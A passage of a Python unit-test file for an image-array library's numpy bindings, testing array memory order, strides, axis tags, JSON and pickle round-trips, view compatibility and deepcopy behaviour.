b = cls(img, dtype=numpy.uint8, order='C')
assert_equal(sys.getrefcount(b), 2)
checkShape(b.shape, img.shape)
checkStride(b.strides, computeCStrides(b.shape))
assert_equal(b.axistags, img.axistags)
assert_equal(b.order, "C")
assert b.flags.c_contiguous
assert not b.flags.f_contiguous
assert (b==img).all()
assert_equal(b.strides, (-b).strides)
assert_equal(b.strides, (b+b).strides)
assert_equal(b.strides, (b*2).strides)
assert_equal(b.axistags, (-b).axistags)
assert_equal(b.axistags, (b+b).axistags)
assert_equal(b.axistags, (b*2).axistags)
img = cls(fshape, order="F")
b = cls(img, dtype=numpy.uint8, order='F')
assert_equal(sys.getrefcount(b), 2)
checkShape(b.shape, img.shape)
checkStride(b.strides, computeFStrides(b.shape))
assert_equal(b.axistags, img.axistags)
assert_equal(b.order, "F")
assert not b.flags.c_contiguous
assert b.flags.f_contiguous
assert (b==img).all()
assert_equal(b.strides, (-b).strides)
assert_equal(b.strides, (b+b).strides)
assert_equal(b.strides, (b*2).strides)
assert_equal(b.axistags, (-b).axistags)
assert_equal(b.axistags, (b+b).axistags)
assert_equal(b.axistags, (b*2).axistags)
value = 100 if channels == 1 else range(100,channels+100)
# test ndarray view
img = cls(vshape, order="V")
v1 = img.view(numpy.ndarray)
v2 = img.view(numpy.ndarray)
assert type(v1) is numpy.ndarray
assert (v1==v2).all()
assert numpy.may_share_memory(v1, img)
v1[3,4] = value
assert (v2[3,4]==value).all()
assert (v1==v2).all()
def checkFailure(obj, n):
f = getattr(vt, n)
try:
f(obj)
except ArgumentError:
return
raise AssertionError("%r did not throw ArgumentError as expected when passed a %r with shape %s, stride %s, axistags '%s'" % (n, type(obj), str(obj.shape), str(obj.strides), repr(getattr(obj, "axistags", "none"))))
def checkCompatibility(obj, compatible):
for n in compatible:
try:
f = getattr(vt, n)
shape, acopy, default_ordering, same_ordering = f(obj)
assert_equal(obj.shape, shape)
assert_equal(obj.__class__, acopy.__class__)
assert_equal(obj.shape, acopy.shape)
if hasattr(obj, 'axistags'):
assert_equal(obj.axistags, acopy.axistags)
else:
assert(not hasattr(acopy, 'axistags'))
if n != "testAny":
assert_equal(obj.shape, same_ordering.shape)
assert(obj.view(numpy.ndarray) == same_ordering.view(numpy.ndarray)).all()
if not hasattr(obj, 'axistags'):
assert_equal(numpy.ndarray, same_ordering.__class__)
assert(not hasattr(same_ordering, 'axistags'))
if n.startswith("testArray"):
assert_equal(numpy.ndarray, default_ordering.__class__)
assert_equal(obj.shape, default_ordering.shape)
assert(obj.view(numpy.ndarray) == default_ordering.view(numpy.ndarray)).all()
assert(not hasattr(default_ordering, 'axistags'))
else:
assert_equal(arraytypes.VigraArray, default_ordering.__class__)
assert_equal(default_ordering.axistags,
arraytypes.VigraArray.defaultAxistags(default_ordering.ndim))
if obj.ndim == default_ordering.ndim:
assert_equal(obj.shape, default_ordering.shape)
assert(obj.view(numpy.ndarray) == default_ordering.view(numpy.ndarray)).all()
else:
assert_equal(obj.shape + (1,), default_ordering.shape)
assert(obj.view(numpy.ndarray) == default_ordering[...,0].view(numpy.ndarray)).all()
else:
assert_equal(arraytypes.VigraArray, same_ordering.__class__)
assert_equal(obj.axistags, same_ordering.axistags)
if n.startswith("testArray"):
assert_equal(numpy.ndarray, default_ordering.__class__)
fobj = obj.transposeToNormalOrder()
fshape = fobj.shape
assert_equal(fshape, default_ordering.shape)
assert(fobj.view(numpy.ndarray) == default_ordering.view(numpy.ndarray)).all()
assert(not hasattr(default_ordering, 'axistags'))
else:
assert_equal(arraytypes.VigraArray, default_ordering.__class__)
dobj = obj.transposeToOrder(arraytypes.VigraArray.defaultOrder)
dshape = dobj.shape
assert_equal(default_ordering.axistags,
arraytypes.VigraArray.defaultAxistags(default_ordering.ndim))
if obj.ndim == default_ordering.ndim:
assert_equal(dshape, default_ordering.shape)
assert(dobj.view(numpy.ndarray) == default_ordering.view(numpy.ndarray)).all()
else:
assert_equal(dshape + (1,), default_ordering.shape)
assert(dobj.view(numpy.ndarray) == default_ordering[...,0].view(numpy.ndarray)).all()
except Exception:
print("exception in %s with shape %s strides %s tags (%s)" % (n, obj.shape, obj.strides,
repr(getattr(obj, "axistags", "none"))))
raise
incompatible = allTests.difference(compatible)
for n in incompatible:
try:
checkFailure(obj, n)
except Exception:
print("exception in %s with shape %s strides %s tags (%s)" % (n, obj.shape, obj.strides,
repr(getattr(obj, "axistags", "none"))))
raise
def testAxisTags():
axistags = AxisTags(AxisInfo.c(description="RGB"),
AxisInfo.ft(3.0, "time frequency"),
AxisInfo.y(0.5),
AxisInfo.z(4, "confocal depth"))
json = '''{
"axes": [
{
"key": "c",
"typeFlags": 1,
"resolution": 0,
"description": "RGB"
},
{
"key": "t",
"typeFlags": 24,
"resolution": 3,
"description": "time frequency"
},
{
"key": "y",
"typeFlags": 2,
"resolution": 0.5,
"description": ""
},
{
"key": "z",
"typeFlags": 2,
"resolution": 4,
"description": "confocal depth"
}
]
}'''
assert_equal(axistags.toJSON(), json)
readBack = AxisTags.fromJSON(json)
assert_equal(axistags, readBack)
assert_equal(readBack[0].description, "RGB")
assert_equal(readBack[1].description, "time frequency")
assert_equal(readBack[2].description, "")
assert_equal(readBack[3].description, "confocal depth")
assert_equal(readBack[0].resolution, 0)
assert_equal(readBack[1].resolution, 3)
assert_equal(readBack[2].resolution, 0.5)
assert_equal(readBack[3].resolution, 4)
import pickle
s = pickle.dumps(axistags)
unpickled = pickle.loads(s)
assert_equal(axistags, unpickled)
assert_equal(unpickled[0].description, "RGB")
assert_equal(unpickled[1].description, "time frequency")
assert_equal(unpickled[2].description, "")
assert_equal(unpickled[3].description, "confocal depth")
assert_equal(unpickled[0].resolution, 0)
assert_equal(unpickled[1].resolution, 3)
assert_equal(unpickled[2].resolution, 0.5)
assert_equal(unpickled[3].resolution, 4)
# FIXME: add more tests here
defaultTags = arraytypes.VigraArray.defaultAxistags('cxyt')
assert_equal(defaultTags.permutationToOrder('A'), (0, 1, 2, 3))
assert_equal(defaultTags.permutationToOrder('F'), (0, 1, 2, 3))
assert_equal(defaultTags.permutationToOrder('C'), (3, 2, 1, 0))
assert_equal(defaultTags.permutationToOrder('V'), (1, 2, 3, 0))
assert_equal(defaultTags.permutationToNormalOrder(), (0, 1, 2, 3))
assert_equal(defaultTags.permutationToNumpyOrder(), (3, 2, 1, 0))
assert_equal(defaultTags.permutationToVigraOrder(), (1, 2, 3, 0))
assert_equal(defaultTags.permutationFromNormalOrder(), (0, 1, 2, 3))
assert_equal(defaultTags.permutationFromNumpyOrder(), (3, 2, 1, 0))
assert_equal(defaultTags.permutationFromVigraOrder(), (3, 0, 1, 2))
defaultTags = arraytypes.AxisTags(4)
assert_equal(defaultTags.permutationToOrder('A'), (0, 1, 2, 3))
assert_equal(defaultTags.permutationToOrder('F'), (0, 1, 2, 3))
assert_equal(defaultTags.permutationToOrder('C'), (3, 2, 1, 0))
assert_equal(defaultTags.permutationToOrder('V'), (0, 1, 2, 3))
assert_equal(arraytypes.VigraArray.defaultAxistags('cxyz'),
arraytypes.VigraArray.defaultAxistags(4, order='F'))
assert_equal(arraytypes.VigraArray.defaultAxistags('zyxc'),
arraytypes.VigraArray.defaultAxistags(4, order='C'))
assert_equal(arraytypes.VigraArray.defaultAxistags('xyzc'),
arraytypes.VigraArray.defaultAxistags(4, order='V'))
assert_equal(arraytypes.VigraArray.defaultAxistags('xyzc'),
arraytypes.VigraArray.defaultAxistags(4, order='A'))
for order in 'VCF':
defaultTags = arraytypes.VigraArray.defaultAxistags(3, order=order)
assert_equal(defaultTags.permutationToOrder(order), (0, 1, 2))
assert (defaultTags.channelIndex == 0 if order == 'F' else 2)
defaultTags.transpose(defaultTags.permutationToOrder('V'))
assert_equal(defaultTags.permutationToVigraOrder(), (0, 1, 2))
assert (defaultTags.channelIndex == 2)
defaultTags = arraytypes.VigraArray.defaultAxistags(3, order=order, noChannels=True)
assert_equal(defaultTags.permutationToOrder(order), (0, 1, 2))
assert (defaultTags.channelIndex == 3)
def testImage1():
checkArray(arraytypes.Image, 1, 2)
shape = (10, 20)
rshape = (20, 10)
c = ["testAny",
"testArray3Unstrided", "testArray3Strided",
"testImageSinglebandUnstrided", "testImageSinglebandStrided",
"testImageMultibandUnstrided", "testImageMultibandStrided"]
checkCompatibility(arraytypes.Image(rshape, order='C', value=2), c)
checkCompatibility(arraytypes.Image(shape, order='V', value=2), c)
checkCompatibility(arraytypes.Image(shape, order='F', value=2), c)
c = ["testAny",
"testArray2Strided",
"testImageSinglebandStrided",
"testImageMultibandStrided"]
a = numpy.ndarray(rshape, dtype=numpy.float32)
a[...] = 2
checkCompatibility(a, c)
img = arraytypes.Image(rshape, order='C').dropChannelAxis()
checkShape(vt.viewArray2Unstrided(img), shape)
assert_equal(img[0,0], 1)
img = arraytypes.Image(shape, order='V').dropChannelAxis()
checkShape(vt.viewArray2Unstrided(img), shape)
assert_equal(img[0,0], 1)
img = arraytypes.Image(shape, order='F').dropChannelAxis()
checkShape(vt.viewArray2Unstrided(img), shape)
assert_equal(img[0,0], 1)
def testImage2():
checkArray(arraytypes.Image, 2, 2)
shape = (10, 20, 2)
cshape = (20, 10, 2)
fshape = (2, 10, 20)
c = ["testAny",
"testArray3Unstrided", "testArray3Strided",
"testImageVector2Unstrided", "testImageVector2Strided",
"testImageMultibandStrided"]
checkCompatibility(arraytypes.Image(cshape, order='C', value=2), c)
checkCompatibility(arraytypes.Image(shape, order='V', value=2), c)
checkCompatibility(arraytypes.Image(fshape, order='F', value=2), c)
c = ["testAny",
"testArray3Strided",
"testImageMultibandStrided",
"testImageVector2Strided",
"testVolumeSinglebandStrided",
"testVolumeMultibandStrided"]
a = numpy.ndarray(cshape, dtype=numpy.float32)
a[...] = 2
checkCompatibility(a, c)
img = arraytypes.Image(cshape, order='C')
assert_equal(vt.viewArray3Unstrided(img), fshape)
assert (img[0,0]==(1,0)).all()
img = arraytypes.Image(shape, order='V')
assert_equal(vt.viewArray3Unstrided(img), fshape)
assert (img[0,0]==(1,0)).all()
img = arraytypes.Image(fshape, order='F')
assert_equal(vt.viewArray3Strided(img), fshape)
assert (img[:,0,0]==(1,0)).all()
img = arraytypes.Image(cshape, order='C')
assert_equal(vt.viewImageVector2Strided(img), shape[:-1])
assert (img[0,0]==(1,1)).all()
img = arraytypes.Image(shape, order='V')
assert_equal(vt.viewImageVector2Unstrided(img), shape[:-1])
assert (img[0,0]==(1,1)).all()
def testScalarImage():
checkArray(arraytypes.ScalarImage, 1, 2, False)
shape = (10, 20)
cshape = (20, 10)
c = ["testAny",
"testArray2Unstrided", "testArray2Strided",
"testImageSinglebandUnstrided", "testImageSinglebandStrided",
"testImageMultibandUnstrided", "testImageMultibandStrided"]
checkCompatibility(arraytypes.ScalarImage(cshape, order='C', value=2), c)
checkCompatibility(arraytypes.ScalarImage(shape, order='V', value=2), c)
checkCompatibility(arraytypes.ScalarImage(shape, order='F', value=2), c)
c = ["testAny",
"testArray2Strided",
"testImageSinglebandStrided",
"testImageMultibandStrided"]
checkCompatibility(arraytypes.ScalarImage(cshape, order='C', value=2).view(numpy.ndarray), c)
img = arraytypes.ScalarImage(cshape, order='C')
checkShape(vt.viewArray2Unstrided(img), shape)
assert_equal(img[0,0], 1)
img = arraytypes.ScalarImage(shape, order='V')
checkShape(vt.viewArray2Unstrided(img), shape)
assert_equal(img[0,0], 1)
img = arraytypes.ScalarImage(shape, order='F')
checkShape(vt.viewArray2Strided(img), shape)
assert_equal(img[0,0], 1)
def testRGBImage():
checkArray(arraytypes.RGBImage, 3, 2)
cshape = (20, 10)
shape = (10, 20)
rshape = (3, 10, 20)
c = ["testAny",
"testArray3Unstrided", "testArray3Strided",
"testImageRGBUnstrided", "testImageRGBStrided",
"testImageMultibandStrided"]
checkCompatibility(arraytypes.RGBImage(cshape, order='C', value=2), c)
checkCompatibility(arraytypes.RGBImage(shape, order='V', value=2), c)
checkCompatibility(arraytypes.RGBImage(shape, order='F', value=2), c)
c = ["testAny",
"testArray3Strided",
"testImageMultibandStrided",
"testImageRGBStrided",
"testVolumeSinglebandStrided",
"testVolumeMultibandStrided"]
checkCompatibility(arraytypes.RGBImage(cshape, order='C', value=2).view(numpy.ndarray), c)
img = arraytypes.RGBImage(cshape, order='C')
assert_equal(vt.viewArray3Unstrided(img), rshape)
assert (img[0,0]==(1,0,0)).all()
img = arraytypes.RGBImage(shape, order='V')
assert_equal(vt.viewArray3Unstrided(img), rshape)
assert (img[0,0]==(1,0,0)).all()
img = arraytypes.RGBImage(shape, order='F')
assert_equal(vt.viewArray3Strided(img), rshape)
assert (img[:,0,0]==(1,0,0)).all()
img = arraytypes.RGBImage(cshape, order='C')
assert_equal(vt.viewImageRGBUnstrided(img), shape)
assert (img[0,0]==(1,1,1)).all()
img = arraytypes.RGBImage(shape, order='V')
assert_equal(vt.viewImageRGBStrided(img), shape)
assert (img[0,0]==(1,1,1)).all()
def testVector2Image():
checkArray(arraytypes.Vector2Image, 2, 2)
cshape = (20, 10)
shape = (10, 20)
rshape = (2, 10, 20)
c = ["testAny",
"testArray3Unstrided", "testArray3Strided",
"testImageVector2Unstrided", "testImageVector2Strided",
"testImageMultibandStrided"]
checkCompatibility(arraytypes.Vector2Image(cshape, order='C', value=2), c)
checkCompatibility(arraytypes.Vector2Image(shape, order='V', value=2), c)
checkCompatibility(arraytypes.Vector2Image(shape, order='F', value=2), c)
c = ["testAny",
"testArray3Strided",
"testImageMultibandStrided",
"testImageVector2Strided",
"testVolumeSinglebandStrided",
"testVolumeMultibandStrided"]
checkCompatibility(arraytypes.Vector2Image(cshape, order='C', value=2).view(numpy.ndarray), c)
img = arraytypes.Vector2Image(cshape, order='C')
assert_equal(vt.viewArray3Unstrided(img), rshape)
assert (img[0,0]==(1,0)).all()
img = arraytypes.Vector2Image(shape, order='V')
assert_equal(vt.viewArray3Unstrided(img), rshape)
assert (img[0,0]==(1,0)).all()
img = arraytypes.Vector2Image(shape, order='F')
assert_equal(vt.viewArray3Strided(img), rshape)
assert (img[:,0,0]==(1,0)).all()
img = arraytypes.Vector2Image(cshape, order='C')
assert_equal(vt.viewImageVector2Unstrided(img), shape)
assert (img[0,0]==(1,1)).all()
img = arraytypes.Vector2Image(shape, order='V')
assert_equal(vt.viewImageVector2Unstrided(img), shape)
assert (img[0,0]==(1,1)).all()
def testVector3Image():
checkArray(arraytypes.Vector3Image, 3, 2)
def testVector4Image():
checkArray(arraytypes.Vector4Image, 4, 2)
def testVolume1():
checkArray(arraytypes.Volume, 1, 3)
shape = (5, 10, 20)
rshape = (20, 10, 5)
c = ["testAny",
"testArray4Unstrided", "testArray4Strided",
"testVolumeSinglebandUnstrided", "testVolumeSinglebandStrided",
"testVolumeMultibandUnstrided", "testVolumeMultibandStrided"]
checkCompatibility(arraytypes.Volume(rshape, order='C', value=2), c)
checkCompatibility(arraytypes.Volume(shape, order='V', value=2), c)
checkCompatibility(arraytypes.Volume(shape, order='F', value=2), c)
c = ["testAny",
"testArray3Strided",
"testImageMultibandStrided",
"testVolumeSinglebandStrided",
"testVolumeMultibandStrided"]
a = numpy.ndarray(rshape, dtype=numpy.float32)
a[...] = 2
checkCompatibility(a, c)
vol = arraytypes.Volume(rshape, order='C').dropChannelAxis()
checkShape(vt.viewArray3Unstrided(vol), shape)
assert_equal(vol[0,0,0], 1)
vol = arraytypes.Volume(shape, order='V').dropChannelAxis()
checkShape(vt.viewArray3Unstrided(vol), shape)
assert_equal(vol[0,0,0], 1)
vol = arraytypes.Volume(shape, order='F').dropChannelAxis()
checkShape(vt.viewArray3Unstrided(vol), shape)
assert_equal(vol[0,0,0], 1)
def testVolume2():
checkArray(arraytypes.Volume, 2, 3)
shape = (5, 10, 20, 2)
cshape = (20, 10, 5, 2)
fshape = (2, 5, 10, 20)
c = ["testAny",
"testArray4Unstrided", "testArray4Strided",
"testVolumeVector2Unstrided", "testVolumeVector2Strided",
"testVolumeMultibandStrided"]
checkCompatibility(arraytypes.Volume(cshape, order='C', value=2), c)
checkCompatibility(arraytypes.Volume(shape, order='V', value=2), c)
checkCompatibility(arraytypes.Volume(fshape, order='F', value=2), c)
c = ["testAny",
"testArray4Strided",
"testVolumeVector2Strided",
"testVolumeMultibandStrided"]
a = numpy.ndarray(cshape, dtype=numpy.float32)
a[...] = 2
checkCompatibility(a, c)
vol = arraytypes.Volume(cshape, order='C')
assert_equal(vt.viewArray4Unstrided(vol), fshape)
assert (vol[0,0,0]==(1,0)).all()
vol = arraytypes.Volume(shape, order='V')
assert_equal(vt.viewArray4Unstrided(vol), fshape)
assert (vol[0,0,0]==(1,0)).all()
vol = arraytypes.Volume(fshape, order='F')
assert_equal(vt.viewArray4Strided(vol), fshape)
assert (vol[:,0,0,0]==(1,0)).all()
vol = arraytypes.Volume(cshape, order='C')
assert_equal(vt.viewVolumeVector2Unstrided(vol), shape[:-1])
assert (vol[0,0,0]==(1,1)).all()
vol = arraytypes.Volume(shape, order='V')
assert_equal(vt.viewVolumeVector2Unstrided(vol), shape[:-1])
assert (vol[0,0,0]==(1,1)).all()
def testScalarVolume():
checkArray(arraytypes.ScalarVolume, 1, 3, False)
cshape = (20, 10, 5)
shape = (5, 10, 20)
c = ["testAny",
"testArray3Unstrided", "testArray3Strided",
"testVolumeSinglebandUnstrided", "testVolumeSinglebandStrided",
"testVolumeMultibandUnstrided", "testVolumeMultibandStrided"]
checkCompatibility(arraytypes.ScalarVolume(cshape, order='C', value=2), c)
checkCompatibility(arraytypes.ScalarVolume(shape, order='V', value=2), c)
checkCompatibility(arraytypes.ScalarVolume(shape, order='F', value=2), c)
c = ["testAny",
"testArray3Strided",
"testImageMultibandStrided",
"testVolumeSinglebandStrided",
"testVolumeMultibandStrided"]
checkCompatibility(arraytypes.ScalarVolume(cshape, order='C', value=2).view(numpy.ndarray), c)
vol = arraytypes.ScalarVolume(cshape, order='C')
checkShape(vt.viewArray3Unstrided(vol), shape)
assert_equal(vol[0,0,0], 1)
vol = arraytypes.ScalarVolume(shape, order='V')
checkShape(vt.viewArray3Unstrided(vol), shape)
assert_equal(vol[0,0,0], 1)
vol = arraytypes.ScalarVolume(shape, order='F')
checkShape(vt.viewArray3Strided(vol), shape)
assert_equal(vol[0,0,0], 1)
def testRGBVolume():
checkArray(arraytypes.RGBVolume, 3, 3)
cshape = (20, 10, 5)
shape = (5, 10, 20)
rshape = (3, 5, 10, 20)
c = ["testAny",
"testArray4Unstrided", "testArray4Strided",
"testVolumeRGBUnstrided", "testVolumeRGBStrided",
"testVolumeMultibandStrided"]
checkCompatibility(arraytypes.RGBVolume(cshape, order='C', value=2), c)
checkCompatibility(arraytypes.RGBVolume(shape, order='V', value=2), c)
checkCompatibility(arraytypes.RGBVolume(shape, order='F', value=2), c)
c = ["testAny",
"testArray4Strided",
"testVolumeRGBStrided",
"testVolumeMultibandStrided"]
checkCompatibility(arraytypes.RGBVolume(cshape, order='C', value=2).view(numpy.ndarray), c)
vol = arraytypes.RGBVolume(cshape, order='C')
checkShape(vt.viewArray4Unstrided(vol), rshape)
assert (vol[0,0,0]==(1,0,0)).all()
vol = arraytypes.RGBVolume(shape, order='V')
checkShape(vt.viewArray4Unstrided(vol), rshape)
assert (vol[0,0,0]==(1,0,0)).all()
vol = arraytypes.RGBVolume(shape, order='F')
checkShape(vt.viewArray4Strided(vol), rshape)
assert (vol[:,0,0,0]==(1,0,0)).all()
vol = arraytypes.RGBVolume(cshape, order='C')
checkShape(vt.viewVolumeRGBUnstrided(vol), shape)
assert (vol[0,0,0]==(1,1,1)).all()
vol = arraytypes.RGBVolume(shape, order='V')
checkShape(vt.viewVolumeRGBUnstrided(vol), shape)
assert (vol[0,0,0]==(1,1,1)).all()
def testVector2Volume():
checkArray(arraytypes.Vector2Volume, 2, 3)
cshape = (20, 10, 5)
shape = (5, 10, 20)
rshape = (2, 5, 10, 20)
c = ["testAny",
"testArray4Unstrided", "testArray4Strided",
"testVolumeVector2Unstrided", "testVolumeVector2Strided",
"testVolumeMultibandStrided"]
checkCompatibility(arraytypes.Vector2Volume(cshape, order='C', value=2), c)
checkCompatibility(arraytypes.Vector2Volume(shape, order='V', value=2), c)
checkCompatibility(arraytypes.Vector2Volume(shape, order='F', value=2), c)
c = ["testAny",
"testArray4Strided",
"testVolumeVector2Strided",
"testVolumeMultibandStrided"]
checkCompatibility(arraytypes.Vector2Volume(cshape, order='C', value=2).view(numpy.ndarray), c)
vol = arraytypes.Vector2Volume(cshape, order='C')
checkShape(vt.viewArray4Unstrided(vol), rshape)
assert (vol[0,0,0]==(1,0)).all()
vol = arraytypes.Vector2Volume(shape, order='V')
checkShape(vt.viewArray4Unstrided(vol), rshape)
assert (vol[0,0,0]==(1,0)).all()
vol = arraytypes.Vector2Volume(shape, order='F')
checkShape(vt.viewArray4Strided(vol), rshape)
assert (vol[:,0,0,0]==(1,0)).all()
vol = arraytypes.Vector2Volume(cshape, order='C')
checkShape(vt.viewVolumeVector2Unstrided(vol), shape)
assert (vol[0,0,0]==(1,1)).all()
vol = arraytypes.Vector2Volume(shape, order='V')
checkShape(vt.viewVolumeVector2Unstrided(vol), shape)
assert (vol[0,0,0]==(1,1)).all()
def testVector3Volume():
checkArray(arraytypes.Vector3Volume, 3, 3)
def testVector4Volume():
checkArray(arraytypes.Vector4Volume, 4, 3)
def testTaggedShape():
a = arraytypes.makeAxistags(4)
assert_equal(repr(a), 'x y z c')
a = arraytypes.makeAxistags(4, order='C')
assert_equal(repr(a), 'z y x c')
a = arraytypes.makeAxistags(4, order='F')
assert_equal(repr(a), 'c x y z')
a = arraytypes.makeAxistags(4, order='C', noChannels=True)
assert_equal(repr(a), 't z y x')
a = arraytypes.makeAxistags(4, noChannels=True)
assert_equal(repr(a), 'x y z t')
aa = arraytypes.makeAxistags('xyc')
a = arraytypes.makeAxistags(aa)
assert_equal(repr(a), 'x y c')
assert(a is not aa)
a = arraytypes.makeAxistags(aa, order='C')
assert_equal(repr(a), 'y x c')
assert(a is not aa)
a = arraytypes.makeAxistags(aa, order='F')
assert_equal(repr(a), 'c x y')
assert(a is not aa)
a = arraytypes.makeAxistags(aa, noChannels=True)
assert_equal(repr(a), 'x y')
assert(a is not aa)
a = arraytypes.makeAxistags(aa, order='V', noChannels=True)
assert_equal(repr(a), 'x y')
assert(a is not aa)
a = arraytypes.makeAxistags(aa, order='C', noChannels=True)
assert_equal(repr(a), 'y x')
assert(a is not aa)
a = arraytypes.makeAxistags(aa, order='F', noChannels=True)
assert_equal(repr(a), 'x y')
assert(a is not aa)
a = arraytypes.makeAxistags('xyc', order='V')
assert_equal(repr(a), 'x y c')
a = arraytypes.makeAxistags('xyc', order='C')
assert_equal(repr(a), 'y x c')
a = arraytypes.makeAxistags('xyc', order='F')
assert_equal(repr(a), 'c x y')
a = arraytypes.makeAxistags('xyc', order='F', noChannels=True)
assert_equal(repr(a), 'x y')
a = arraytypes.makeAxistags('xyc', order='V', noChannels=True)
assert_equal(repr(a), 'x y')
a = arraytypes.makeAxistags('xyc', order='C', noChannels=True)
assert_equal(repr(a), 'y x')
a = arraytypes.Image((20,10))
a.axistags.setChannelDescription("in")
res = vt.checkTaggedShapeMultiband(a)
assert_equal(res[0].shape, (20,10,1))
assert_equal(res[0].axistags, a.axistags)
assert_equal(res[0].axistags[2].description, "in")
assert_equal(res[1].shape, (20,10,1))
assert_equal(res[1].axistags, a.axistags)
assert_equal(res[1].axistags[2].description, "res2")
assert_equal(res[2].shape, (20,10,1))
assert_equal(res[2].axistags, a.axistags)
assert_equal(res[2].axistags[2].description, "res3")
assert_equal(res[3].shape, (20,10,3))
assert_equal(res[3].axistags, a.axistags)
assert_equal(res[3].axistags[2].description, "res4")
assert_equal(res[4].shape, (20,10,1))
assert_equal(res[4].axistags, a.axistags)
assert_equal(res[4].axistags[2].description, "res5")
assert_equal(res[5].shape, (20,10,3))
assert_equal(res[5].axistags, a.axistags)
assert_equal(res[5].axistags[2].description, "res6")
res = vt.checkTaggedShapeSingleband(a)
assert_equal(res[0].shape, (20,10,1))
assert_equal(res[0].axistags, a.axistags)
assert_equal(res[0].axistags[2].description, "in")
assert_equal(res[1].shape, (20,10,1))
assert_equal(res[1].axistags, a.axistags)
assert_equal(res[1].axistags[2].description, "res2")
assert_equal(res[2].shape, (20,10,1))
assert_equal(res[2].axistags, a.axistags)
assert_equal(res[2].axistags[2].description, "res3")
assert_equal(res[3].shape, (20,10,3))
assert_equal(res[3].axistags, a.axistags)
assert_equal(res[3].axistags[2].description, "res4")
assert_equal(res[4].shape, (20,10,1))
assert_equal(res[4].axistags, a.axistags)
assert_equal(res[4].axistags[2].description, "res5")
assert_equal(res[5].shape, (20,10,3))
assert_equal(res[5].axistags, a.axistags)
assert_equal(res[5].axistags[2].description, "res6")
a = arraytypes.Image((20,10,2))
a.axistags.setChannelDescription("in")
res = vt.checkTaggedShapeMultiband(a)
assert_equal(res[0].shape, (20,10,2))
assert_equal(res[0].axistags, a.axistags)
assert_equal(res[0].axistags[2].description, "in")
assert_equal(res[1].shape, (20,10,2))
assert_equal(res[1].axistags, a.axistags)
assert_equal(res[1].axistags[2].description, "res2")
assert_equal(res[2].shape, (20,10,1))
assert_equal(res[2].axistags, a.axistags)
assert_equal(res[2].axistags[2].description, "res3")
assert_equal(res[3].shape, (20,10,3))
assert_equal(res[3].axistags, a.axistags)
assert_equal(res[3].axistags[2].description, "res4")
assert_equal(res[4].shape, (20,10,1))
assert_equal(res[4].axistags, a.axistags)
assert_equal(res[4].axistags[2].description, "res5")
assert_equal(res[5].shape, (20,10,3))
assert_equal(res[5].axistags, a.axistags)
assert_equal(res[5].axistags[2].description, "res6")
a = arraytypes.ScalarImage((20,10))
a.axistags.setChannelDescription("in")
resaxistags = copy.copy(a.axistags)
resaxistags.insertChannelAxis()
res = vt.checkTaggedShapeMultiband(a)
assert_equal(res[0].shape, (20,10))
assert_equal(res[0].axistags, a.axistags)
assert_equal(len(res[0].axistags), 2)
assert_equal(res[1].shape, (20,10))
assert_equal(res[1].axistags, a.axistags)
assert_equal(len(res[1].axistags), 2)
assert_equal(res[2].shape, (20,10))
assert_equal(res[2].axistags, a.axistags)
assert_equal(len(res[1].axistags), 2)
assert_equal(res[3].shape, (20,10,3))
assert_equal(res[3].axistags, resaxistags)
assert_equal(res[3].axistags[2].description, "res4")
assert_equal(res[4].shape, (20,10))
assert_equal(res[4].axistags, a.axistags)
assert_equal(len(res[4].axistags), 2)
assert_equal(res[5].shape, (20,10,3))
assert_equal(res[5].axistags, resaxistags)
assert_equal(res[5].axistags[2].description, "res6")
res = vt.checkTaggedShapeSingleband(a)
assert_equal(res[0].shape, (20,10))
assert_equal(res[0].axistags, a.axistags)
assert_equal(len(res[0].axistags), 2)
assert_equal(res[1].shape, (20,10))
assert_equal(res[1].axistags, a.axistags)
assert_equal(len(res[1].axistags), 2)
assert_equal(res[2].shape, (20,10))
assert_equal(res[2].axistags, a.axistags)
assert_equal(len(res[1].axistags), 2)
assert_equal(res[3].shape, (20,10,3))
assert_equal(res[3].axistags, resaxistags)
assert_equal(res[3].axistags[2].description, "res4")
assert_equal(res[4].shape, (20,10))
assert_equal(res[4].axistags, a.axistags)
assert_equal(len(res[4].axistags), 2)
assert_equal(res[5].shape, (20,10,3))
assert_equal(res[5].axistags, resaxistags)
assert_equal(res[5].axistags[2].description, "res6")
a = numpy.zeros((3,4,5))
at = AxisTags(AxisInfo.x, AxisInfo.y, AxisInfo.z)
r = arraytypes.taggedView(a, at)
assert_equal(r.shape, (3,4,5))
assert_equal(r.axistags, at)
assert(r.axistags is not at)
r = arraytypes.taggedView(a, 'xyz')
assert_equal(r.shape, (3,4,5))
assert_equal(r.axistags, at)
r = arraytypes.taggedView(a, 'cyx')
assert_equal(r.shape, (3,4,5))
assert_equal(repr(r.axistags), 'c y x')
try:
r = arraytypes.taggedView(a, 'cxy', order='C')
raise AssertionError("arraytypes.taggedView() failed to throw.")
except RuntimeError:
pass
a = arraytypes.taggedView(a, 'zyx')
r = arraytypes.taggedView(a, order='C')
assert_equal(r.shape, (3,4,5))
assert_equal(repr(r.axistags), 'z y x')
r = arraytypes.taggedView(a, order='V')
assert_equal(r.shape, (5,4,3))
assert_equal(repr(r.axistags), 'x y z')
r = arraytypes.taggedView(a, order='F')
assert_equal(r.shape, (5,4,3))
assert_equal(repr(r.axistags), 'x y z')
a = a[0,...]
r = arraytypes.taggedView(a, 'xcy')
assert_equal(r.shape, (5,1,4))
assert_equal(repr(r.axistags), 'x c y')
r = arraytypes.taggedView(a, 'yxc')
assert_equal(r.shape, (4,5,1))
assert_equal(repr(r.axistags), 'y x c')
try:
r = arraytypes.taggedView(a, 'xcz')
raise AssertionError("arraytypes.taggedView() failed to throw.")
except RuntimeError:
pass
try:
r = arraytypes.taggedView(a, 'xcz', force=True)
raise AssertionError("arraytypes.taggedView() failed to throw.")
except RuntimeError:
pass
r = arraytypes.taggedView(a, 'xz', force=True)
assert_equal(r.shape, (4,5))
assert_equal(repr(r.axistags), 'x z')
a = a[..., arraytypes.newaxis('c')]
r = arraytypes.taggedView(a, order='V')
assert_equal(r.shape, (5, 4, 1))
assert_equal(repr(r.axistags), 'x y c')
r = arraytypes.taggedView(a, order='V', noChannels=True)
assert_equal(r.shape, (5, 4))
assert_equal(repr(r.axistags), 'x y')
def testDeepcopy():
a = arraytypes.RGBImage(numpy.random.random((10, 4, 3)), order='C')
b = copy.deepcopy(a)
assert numpy.all(a == b)
assert_equal(b.flags.c_contiguous, a.flags.c_contiguous)
assert_equal(b.flags.f_contiguous, a.flags.f_contiguous)
assert_equal(b.axistags, a.axistags)
a[0,0,0] += 42
assert b[0,0,0] != a[0,0,0]
a = arraytypes.RGBImage(numpy.random.random((4, 10, 3)), order='V')
